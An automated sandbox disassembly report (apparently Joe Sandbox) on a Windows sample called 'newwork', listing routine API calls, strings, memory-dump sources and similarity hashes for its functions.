                                                                                        • Instruction ID: 1950c6f853cc10ed35e504d9d8503a730f6ffd27dc9bba4e9fa27fab35675349
                                                                                        • Opcode Fuzzy Hash: be4fb59b900ee74e718d87cdc4fcd1eef43a9c564c0a5ec1af3f625bb6e6dd39
                                                                                        • Instruction Fuzzy Hash: 12F0AF31300110DBCB10EB9AD885B6F6299DB9931AF50503BF981DB293E73CCC168629
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegQueryValueExA.ADVAPI32(?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C05
                                                                                        • RegCloseKey.ADVAPI32(?,?,CSDVersion,00000000,?,?,?,?,00000001,00000000), ref: 00483C28
                                                                                        Strings
                                                                                        • System\CurrentControlSet\Control\Windows, xrefs: 00483BD2
                                                                                        • CSDVersion, xrefs: 00483BFC
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: CSDVersion$System\CurrentControlSet\Control\Windows
                                                                                        • API String ID: 3677997916-1910633163
                                                                                        • Opcode ID: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                        • Instruction ID: 1d850e848a14c5c59b8e95f13e5f63a8fb365af486cc5d6c9f9b701d22fca986
                                                                                        • Opcode Fuzzy Hash: 33fca6af7241f4b653fe53c350a6e88c669f1de2ef3da1c7a1752152dae0c121
                                                                                        • Instruction Fuzzy Hash: 56F03176E40208A6DF10EAD48C45BAFB3BCAB14B05F104967EA10F7280E678AB048B59
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemWow64DirectoryA,?,00453B5A,00000000,00453BFD,?,?,00000000,00000000,00000000,00000000,00000000,?,00453FED,00000000), ref: 0042D90A
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042D910
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: GetSystemWow64DirectoryA$kernel32.dll
                                                                                        • API String ID: 1646373207-4063490227
                                                                                        • Opcode ID: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                        • Instruction ID: 657275fb9dfacbe144619f02b172540cf2f0c5a6f4252bec6bd03a25d2dd35a2
                                                                                        • Opcode Fuzzy Hash: 3965e48138ab8598cb17ff311cd558fd433aca8a834515e354a81fb776e31baf
                                                                                        • Instruction Fuzzy Hash: A5E0DFE0B40B0122D70032BA1C82B6B108D4B84728F90053B3894E62D6DDBCD9840A6D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,00000000,0042EAD0), ref: 0042EB62
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EB68
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: ShutdownBlockReasonDestroy$user32.dll
                                                                                        • API String ID: 1646373207-260599015
                                                                                        • Opcode ID: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                        • Instruction ID: e1ec077e445c8734ae54db5ffdd633522f5c412f0b7fee52e54de0d29bb4c321
                                                                                        • Opcode Fuzzy Hash: 88ce12e330a2fc51ece58c284b54de3a76b504cb94a4c995bd1a3fb2c6ea0693
                                                                                        • Instruction Fuzzy Hash: A2D0C793311732665D10B1F73CD1EAB058C891527935404B7F515E5641D55DEC1115AD
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: NotifyWinEvent$user32.dll
                                                                                        • API String ID: 1646373207-597752486
                                                                                        • Opcode ID: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                        • Instruction ID: 5e946f17392c81a4f172a46fe169fb9a1f72c9003761a5edf28bd31acc2f1150
                                                                                        • Opcode Fuzzy Hash: f97c3de5cacafbf63d36e16939e29d51eb7e912e87a0fb2b79f6fc39cd446e20
                                                                                        • Instruction Fuzzy Hash: 59E012F0E417049AFF00BBB57B86B1A3A90E764719B00057FF414A6292DB7C481C4F9D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                        • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressHandleModuleProc
                                                                                        • String ID: DisableProcessWindowsGhosting$user32.dll
                                                                                        • API String ID: 1646373207-834958232
                                                                                        • Opcode ID: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                        • Instruction ID: 34f838485a85c0df890c3e192e44216071158a5cea444d63bbc0a0b2480586ef
                                                                                        • Opcode Fuzzy Hash: 71af8591fbce5d4533a7188bae6238bebf63b2f5996384562a89c67780edd1c3
                                                                                        • Instruction Fuzzy Hash: 22B002C0651707589D5032FA0D06B3F48484C5276D728057F3414A51C6DD6C89115D3F
                                                                                        APIs
                                                                                          • Part of subcall function 0044B658: LoadLibraryA.KERNEL32(uxtheme.dll,?,0044F775,00498BF2), ref: 0044B67F
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044B697
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044B6A9
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044B6BB
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044B6CD
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6DF
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044B6F1
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044B703
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044B715
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044B727
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044B739
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044B74B
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044B75D
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044B76F
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044B781
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044B793
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044B7A5
                                                                                          • Part of subcall function 0044B658: GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B7B7
                                                                                        • LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                        • GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$LibraryLoad
                                                                                        • String ID: SHPathPrepareForWriteA$shell32.dll
                                                                                        • API String ID: 2238633743-2683653824
                                                                                        • Opcode ID: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                        • Instruction ID: ed4894befccbfeda2ad80f7d1b9e1cb4df1a551eae9986247d0c145e26b1cd95
                                                                                        • Opcode Fuzzy Hash: edc6f8ec64a36a5908760ff58e990ea99ea877eb638915fc896b3384d426fa6b
                                                                                        • Instruction Fuzzy Hash: DDB092D0A82740A4C90077F2985B90F2A4488A271EB10153B710476483EABC84100EAE
                                                                                        APIs
                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54), ref: 0047D7CC
                                                                                        • FindClose.KERNEL32(000000FF,0047D7F7,0047D7F0,?,?,?,?,00000000,0047D945,?,?,?,00000000,?,0047DA54,00000000), ref: 0047D7EA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileNext
                                                                                        • String ID:
                                                                                        • API String ID: 2066263336-0
                                                                                        • Opcode ID: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                        • Instruction ID: 2ce97de6e4eb512f8d4c2eb376340b964b0e691095a652a34be041e4083b4e02
                                                                                        • Opcode Fuzzy Hash: df8c12b404288ac1cc0f16a4307cfa19f630790b74cd409a531bdd723e619500
                                                                                        • Instruction Fuzzy Hash: 07813A74D0024D9FCF11EFA5CC91ADFBBB8EF49304F5080AAE908A7291D6399A46CF54
                                                                                        APIs
                                                                                          • Part of subcall function 0042EE30: GetTickCount.KERNEL32 ref: 0042EE36
                                                                                          • Part of subcall function 0042EC88: MoveFileExA.KERNEL32(00000000,00000000,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0042ECBD
                                                                                        • GetLastError.KERNEL32(00000000,00475721,?,?,0049C1E0,00000000), ref: 0047560A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountErrorFileLastMoveTick
                                                                                        • String ID: $LoggedMsgBox returned an unexpected value. Assuming Cancel.$MoveFileEx
                                                                                        • API String ID: 2406187244-2685451598
                                                                                        • Opcode ID: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                        • Instruction ID: cfe7f312216358cbd0971b398f0cafde252de4893b1317a5ce8d70824cf78b76
                                                                                        • Opcode Fuzzy Hash: b4e541c37b522712e9a51433fba2d6f7c47cca6c6c5b44fd3a0118cd85a505a9
                                                                                        • Instruction Fuzzy Hash: 4D418570A006099BDB10EFA5D882AEF77B5FF48314F508537E408BB395D7789A058BA9
                                                                                        APIs
                                                                                        • GetDesktopWindow.USER32 ref: 00413D46
                                                                                        • GetDesktopWindow.USER32 ref: 00413DFE
                                                                                          • Part of subcall function 00418EC0: 6F59C6F0.COMCTL32(?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EDC
                                                                                          • Part of subcall function 00418EC0: ShowCursor.USER32(00000001,?,00000000,00413FC3,00000000,004140D3,?,?,0049B628), ref: 00418EF9
                                                                                        • SetCursor.USER32(00000000,?,?,?,?,00413AF3,00000000,00413B06), ref: 00413E3C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CursorDesktopWindow$Show
                                                                                        • String ID:
                                                                                        • API String ID: 2074268717-0
                                                                                        • Opcode ID: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                        • Instruction ID: d0219f8535474b9b7e790bb207accfb6dce16a9ac66decbe361331da1304c66b
                                                                                        • Opcode Fuzzy Hash: 48e3412c1a46991eea637d4b1b247886da5b7466a2ee9d80c19fa9edf3c8b710
                                                                                        • Instruction Fuzzy Hash: 91412C75600210AFC710DF2AFA84B56B7E1EB65329B16817BE405CB365DB38DD81CF98
                                                                                        APIs
                                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100), ref: 00408A75
                                                                                        • LoadStringA.USER32(00400000,0000FF9E,?,00000040), ref: 00408AE4
                                                                                        • LoadStringA.USER32(00400000,0000FF9F,?,00000040), ref: 00408B7F
                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 00408BBE
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString$FileMessageModuleName
                                                                                        • String ID:
                                                                                        • API String ID: 704749118-0
                                                                                        • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                        • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                        • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                        • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                        APIs
                                                                                        • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                          • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                        • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                          • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                        • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                        • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                        • String ID:
                                                                                        • API String ID: 855768636-0
                                                                                        • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                        • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                        • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                        • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                        APIs
                                                                                        • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                        • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                        • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                        • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: OffsetRect
                                                                                        • String ID:
                                                                                        • API String ID: 177026234-0
                                                                                        • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                        • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                        • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                        • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                        APIs
                                                                                        • GetCursorPos.USER32 ref: 00417260
                                                                                        • SetCursor.USER32(00000000), ref: 004172A3
                                                                                        • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                        • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1959210111-0
                                                                                        • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                        • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                        • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                        • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                        APIs
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                        • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                        • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                        • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                        • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                        APIs
                                                                                        • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                        • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                        • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                        • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
